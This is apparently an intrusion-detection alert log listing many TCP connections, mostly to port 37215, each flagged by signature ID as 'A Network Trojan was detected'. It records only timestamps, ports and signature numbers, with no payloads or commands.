                  Timestamp:07/10/24-08:27:22.810848
                  SID:2829579
                  Source Port:47168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.657439
                  SID:2835222
                  Source Port:56500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.881648
                  SID:2835222
                  Source Port:53052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.084191
                  SID:2835222
                  Source Port:35188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.143313
                  SID:2829579
                  Source Port:35002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.826024
                  SID:2829579
                  Source Port:45382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.325316
                  SID:2835222
                  Source Port:45866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.120282
                  SID:2835222
                  Source Port:40856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.770002
                  SID:2829579
                  Source Port:47542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.849175
                  SID:2835222
                  Source Port:49598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.566110
                  SID:2829579
                  Source Port:59274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.598886
                  SID:2835222
                  Source Port:34408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281156
                  SID:2829579
                  Source Port:36960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.668862
                  SID:2829579
                  Source Port:53654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.518596
                  SID:2835222
                  Source Port:42002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.501688
                  SID:2835222
                  Source Port:58662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.858439
                  SID:2829579
                  Source Port:47624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.662603
                  SID:2835222
                  Source Port:41536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.773562
                  SID:2829579
                  Source Port:57856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131250
                  SID:2829579
                  Source Port:49632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.299402
                  SID:2829579
                  Source Port:47138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.365312
                  SID:2829579
                  Source Port:34220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.848554
                  SID:2829579
                  Source Port:44866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.128256
                  SID:2829579
                  Source Port:36184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.333013
                  SID:2835222
                  Source Port:44702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234047
                  SID:2835222
                  Source Port:56944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.572202
                  SID:2835222
                  Source Port:48692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.370948
                  SID:2829579
                  Source Port:49362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.933980
                  SID:2829579
                  Source Port:50890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.077199
                  SID:2829579
                  Source Port:58018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.826179
                  SID:2835222
                  Source Port:37258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.942038
                  SID:2835222
                  Source Port:57610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.020359
                  SID:2835222
                  Source Port:36572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.686036
                  SID:2835222
                  Source Port:49966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.196369
                  SID:2835222
                  Source Port:43182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.127373
                  SID:2835222
                  Source Port:48860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.855642
                  SID:2829579
                  Source Port:40338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.285342
                  SID:2829579
                  Source Port:58188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.535069
                  SID:2835222
                  Source Port:33236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.651678
                  SID:2835222
                  Source Port:33766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.900160
                  SID:2835222
                  Source Port:37356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.818731
                  SID:2829579
                  Source Port:39636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835700
                  SID:2835222
                  Source Port:56638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.566844
                  SID:2829579
                  Source Port:41106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.384907
                  SID:2835222
                  Source Port:50260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.411856
                  SID:2829579
                  Source Port:40902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.780678
                  SID:2835222
                  Source Port:57970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.636807
                  SID:2835222
                  Source Port:54856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617343
                  SID:2835222
                  Source Port:39482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.525965
                  SID:2829579
                  Source Port:44256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.973446
                  SID:2835222
                  Source Port:58548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.489140
                  SID:2835222
                  Source Port:45076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.942691
                  SID:2835222
                  Source Port:37886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.545025
                  SID:2835222
                  Source Port:49240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.786034
                  SID:2829579
                  Source Port:34168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.351373
                  SID:2829579
                  Source Port:41480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.879790
                  SID:2829579
                  Source Port:33622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.017676
                  SID:2835222
                  Source Port:33578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.113848
                  SID:2835222
                  Source Port:52570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.509826
                  SID:2829579
                  Source Port:57190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.077860
                  SID:2829579
                  Source Port:47878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.897664
                  SID:2829579
                  Source Port:52522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.003355
                  SID:2835222
                  Source Port:50302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.206981
                  SID:2829579
                  Source Port:48874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.829526
                  SID:2829579
                  Source Port:40458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.547340
                  SID:2835222
                  Source Port:54888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.465521
                  SID:2835222
                  Source Port:54522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.379672
                  SID:2829579
                  Source Port:46682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.471536
                  SID:2835222
                  Source Port:38702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.042912
                  SID:2030490
                  Source Port:55714
                  Destination Port:5976
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.839974
                  SID:2829579
                  Source Port:58424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.189218
                  SID:2829579
                  Source Port:54472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.909297
                  SID:2829579
                  Source Port:36730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.994727
                  SID:2829579
                  Source Port:51972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.538160
                  SID:2829579
                  Source Port:36586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.612080
                  SID:2829579
                  Source Port:52262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037412
                  SID:2829579
                  Source Port:50476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.435819
                  SID:2835222
                  Source Port:54666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.566038
                  SID:2835222
                  Source Port:49258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.189760
                  SID:2829579
                  Source Port:60902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.224175
                  SID:2835222
                  Source Port:39602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.853498
                  SID:2835222
                  Source Port:48852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.583979
                  SID:2829579
                  Source Port:41520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.528508
                  SID:2835222
                  Source Port:42144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.322377
                  SID:2835222
                  Source Port:57904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.952249
                  SID:2835222
                  Source Port:39740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.077497
                  SID:2835222
                  Source Port:36950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589238
                  SID:2835222
                  Source Port:38406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.514091
                  SID:2835222
                  Source Port:41118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.764086
                  SID:2835222
                  Source Port:38888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.966896
                  SID:2829579
                  Source Port:54792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.373909
                  SID:2835222
                  Source Port:60148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.553454
                  SID:2829579
                  Source Port:44590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.412614
                  SID:2829579
                  Source Port:50710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.598533
                  SID:2835222
                  Source Port:36534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.165802
                  SID:2829579
                  Source Port:43462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.327851
                  SID:2829579
                  Source Port:33022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.489604
                  SID:2835222
                  Source Port:48030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.420530
                  SID:2835222
                  Source Port:39540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.590272
                  SID:2835222
                  Source Port:37474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.864190
                  SID:2829579
                  Source Port:50486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.290878
                  SID:2835222
                  Source Port:40108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.433517
                  SID:2829579
                  Source Port:50008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.456232
                  SID:2835222
                  Source Port:36890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.308441
                  SID:2835222
                  Source Port:34018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.784131
                  SID:2829579
                  Source Port:40020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.441916
                  SID:2835222
                  Source Port:57596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.723852
                  SID:2835222
                  Source Port:59396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.002709
                  SID:2835222
                  Source Port:45550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.879483
                  SID:2835222
                  Source Port:43952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392573
                  SID:2835222
                  Source Port:42400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.806375
                  SID:2829579
                  Source Port:45506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.034414
                  SID:2829579
                  Source Port:60002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647061
                  SID:2829579
                  Source Port:43532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.647317
                  SID:2829579
                  Source Port:39026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.159132
                  SID:2835222
                  Source Port:33156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.960576
                  SID:2829579
                  Source Port:51862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.380446
                  SID:2829579
                  Source Port:50136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.161140
                  SID:2835222
                  Source Port:55720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589872
                  SID:2835222
                  Source Port:57040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.766311
                  SID:2829579
                  Source Port:38734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.616185
                  SID:2835222
                  Source Port:44396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.004841
                  SID:2829579
                  Source Port:52212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600154
                  SID:2835222
                  Source Port:39650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.956941
                  SID:2835222
                  Source Port:54312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.776398
                  SID:2835222
                  Source Port:48704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.858980
                  SID:2835222
                  Source Port:46300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.771362
                  SID:2835222
                  Source Port:53012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.974355
                  SID:2835222
                  Source Port:44232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555849
                  SID:2835222
                  Source Port:41994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.179798
                  SID:2835222
                  Source Port:57558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.923335
                  SID:2829579
                  Source Port:54538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.262409
                  SID:2829579
                  Source Port:55926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.970064
                  SID:2835222
                  Source Port:35320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.515772
                  SID:2829579
                  Source Port:45438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.890192
                  SID:2835222
                  Source Port:37226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.893160
                  SID:2829579
                  Source Port:34276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.078172
                  SID:2835222
                  Source Port:44060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.899646
                  SID:2829579
                  Source Port:39516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.447222
                  SID:2835222
                  Source Port:34228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.460013
                  SID:2835222
                  Source Port:40308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.113907
                  SID:2835222
                  Source Port:40140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.596556
                  SID:2835222
                  Source Port:46026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.413310
                  SID:2829579
                  Source Port:57568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.407973
                  SID:2829579
                  Source Port:34384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.468804
                  SID:2829579
                  Source Port:38188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.373559
                  SID:2829579
                  Source Port:43180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.155476
                  SID:2829579
                  Source Port:53940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.682326
                  SID:2829579
                  Source Port:59276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.175137
                  SID:2829579
                  Source Port:56522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.506153
                  SID:2835222
                  Source Port:54846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981659
                  SID:2829579
                  Source Port:52202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.013020
                  SID:2829579
                  Source Port:36100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.171305
                  SID:2835222
                  Source Port:55784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.861410
                  SID:2835222
                  Source Port:53064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.967998
                  SID:2835222
                  Source Port:46020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.259774
                  SID:2835222
                  Source Port:38726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.179823
                  SID:2829579
                  Source Port:57456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.143490
                  SID:2835222
                  Source Port:56314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.826796
                  SID:2835222
                  Source Port:50576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.612334
                  SID:2829579
                  Source Port:41170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164451
                  SID:2829579
                  Source Port:32938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.452655
                  SID:2835222
                  Source Port:39090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.505389
                  SID:2835222
                  Source Port:45902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.010267
                  SID:2829579
                  Source Port:45984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.903843
                  SID:2835222
                  Source Port:32840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.837013
                  SID:2829579
                  Source Port:59742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.622921
                  SID:2829579
                  Source Port:42738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164336
                  SID:2829579
                  Source Port:51004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177713
                  SID:2829579
                  Source Port:58520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.518117
                  SID:2829579
                  Source Port:50096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.467036
                  SID:2835222
                  Source Port:40016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.869834
                  SID:2829579
                  Source Port:35216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.046169
                  SID:2829579
                  Source Port:35792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.844556
                  SID:2835222
                  Source Port:52406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.647215
                  SID:2835222
                  Source Port:44306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.909366
                  SID:2829579
                  Source Port:42878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.764687
                  SID:2835222
                  Source Port:60370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.036336
                  SID:2829579
                  Source Port:58224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.540241
                  SID:2829579
                  Source Port:53618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.776724
                  SID:2829579
                  Source Port:60554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819021
                  SID:2835222
                  Source Port:39568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.055753
                  SID:2835222
                  Source Port:51300
                  Destination Port:37215
                  Protocol:TCP
